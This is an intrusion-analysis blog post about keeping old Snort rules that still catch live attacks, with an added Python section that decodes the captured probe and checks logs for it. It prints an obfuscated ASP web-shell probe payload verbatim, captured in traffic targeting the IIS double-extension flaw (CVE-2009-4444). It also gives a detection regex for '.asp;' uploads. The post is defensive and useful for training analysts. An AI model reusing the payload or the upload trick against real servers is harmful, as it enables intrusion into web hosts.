Information, tools and how-to's for the new intrusion analyst. Mentoring by blogging.

Friday, August 28, 2015

Old Rules Can Still Be Useful

An IDS/IPS needs constant, careful tuning, and one of the ways to do this is to filter out old rules or signatures that are no longer relevant. To this day there is still Code Red traffic on the Internet, but enabling the rules for it would just contribute to the background noise of alerts that aren't relevant any longer. Or one would hope!
But sometimes older alerts can be useful in making you aware of malicious traffic targeting your infrastructure that you might otherwise miss.

As an example, Snort/Sourcefire has a rule "named" SERVER-IIS multiple extension code execution attempt (that's actually the Message field, but there is no name field, so close enough). This is an alert for a vulnerability in IIS servers that goes back to 2009 (CVE-2009-4444). The rule was still turned on by default in the policy applied to the sensors I monitor, and it triggered several alerts with a source IP from China. The payload of the packet was as follows:

autoshell=eval("Ex"%26cHr(101)%26"cute(""Server.ScriptTimeout%3D3600:On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Ex"%26cHr(101)%26"cute(""""On+Error+Resume+Next:""""%26bd(""""526573706F6E73652E5772697465282268616F72656E2229"""")):Response.Write(""""|
The exploit wasn't successful, and the server has been patched for years against the double extension vulnerability (they used .asp;.jpg in the POST command), but it got my attention nonetheless.
It made me aware of the malicious traffic targeting that domain and prompted some investigation to see what other traffic came from the source.
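Here is the payload above decoded in a few lines of Python, so the analyst can see what the probe actually does before deciding how much weight to give the alert. This is an added example, not code from the post: the Python port of the payload's bd() helper, the regex, and the request lines are mine, and the request lines are constructed for illustration. The body is URL-encoded VBScript whose only real content is a hex string handed to bd() and then Execute()d; decoding it shows the probe just writes a marker string back so the scanner can tell whether ASP executed. The second function is a first-pass check for the .asp; double-extension pattern mentioned above.

```python
"""Decode the SERVER-IIS probe payload quoted in the post (added example).

The request body is URL-encoded VBScript.  Its only real content is a hex
string handed to a small helper called bd(), which the script decodes and
then Execute()s.  Porting bd() to Python is enough to read what it says.
"""
import re
from urllib.parse import unquote_plus

# The captured payload, copied from the post (it is cut off there as well).
PAYLOAD = (
    'autoshell=eval("Ex"%26cHr(101)%26"cute(""Server.ScriptTimeout%3D3600:'
    'On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29'
    '+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29'
    '+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26'
    '%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd'
    '%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22'
    '%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22'
    'Next%3AEnd+Function:Response.Write(""""->|""""):Ex"%26cHr(101)%26"cute('
    '""""On+Error+Resume+Next:""""%26bd(""""526573706F6E73652E577269746528'
    '2268616F72656E2229"""")):Response.Write(""""|'
)


def bd(s: str) -> str:
    """Python port of the payload's bd() helper.

    Walk the hex string two characters at a time.  A pair that starts with a
    digit is one byte (chr(&H52) -> 'R'); a pair that starts with a letter is
    joined with the following pair into a four-hex-digit code (a DBCS trick
    the VBScript chr() understands; Python's chr() on the code point is a
    close enough stand-in for ASCII output).
    """
    out, i = [], 0
    while i < len(s):
        pair = s[i:i + 2]
        if pair[0].isdigit():
            out.append(chr(int(pair, 16)))
            i += 2
        else:
            out.append(chr(int(pair + s[i + 2:i + 4], 16)))
            i += 4
    return "".join(out)


# Matches the hex argument in  bd(""""5265...2229"""")  after URL decoding.
HEX_ARG = re.compile(r'bd\("+([0-9A-Fa-f]+)"+\)')


def decode_probe(payload: str = PAYLOAD) -> dict:
    """URL-decode the body, pull out the hex argument to bd() and decode it."""
    decoded = unquote_plus(payload)
    m = HEX_ARG.search(decoded)
    hexstr = m.group(1) if m else ""
    return {"decoded": decoded, "hex": hexstr, "inner": bd(hexstr) if hexstr else ""}


# The post says the POST used .asp;.jpg, the CVE-2009-4444 multiple-extension
# trick.  A match on ".asp;" in the request line is a cheap first-pass check.
DOUBLE_EXT = re.compile(r"\.asp;", re.IGNORECASE)


def find_double_extension(request_lines):
    """Return the request lines that carry an .asp; double extension."""
    return [line for line in request_lines if DOUBLE_EXT.search(line)]


# Constructed request lines for illustration, not taken from the post.
SAMPLE_REQUESTS = [
    "POST /upload/photo.asp;.jpg HTTP/1.1",
    "GET /images/logo.jpg HTTP/1.1",
    "POST /upload/Photo.ASP;.gif HTTP/1.1",
]


if __name__ == "__main__":
    result = decode_probe()
    # "Ex"&cHr(101)&"cute" is just "Execute" split up to dodge naive string matching.
    print("Decoded body starts:", result["decoded"][:80])
    print("Hex argument:", result["hex"])
    print("Decoded argument:", result["inner"])   # Response.Write("haoren")
    print("Double-extension requests:", find_double_extension(SAMPLE_REQUESTS))
```

The decoded argument is `Response.Write("haoren")`, wrapped between the `->|` and `|<-` markers the script writes itself; a scanner that gets those markers back knows the upload ran as ASP. Seeing that the alert is a scanner looking for writable, executable upload paths is exactly the kind of context that makes an "obsolete" rule worth keeping.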

Obviously, you don't want to keep all of your older rules enabled or you'd soon be overwhelmed with alerts, but when you come across one with traffic like this, it might weigh on your decision about whether to disable it as too old or irrelevant. Sometimes, if the traffic warrants it, it might be good to keep a few "canaries in a coal mine" that alert you to malicious intent worth another look.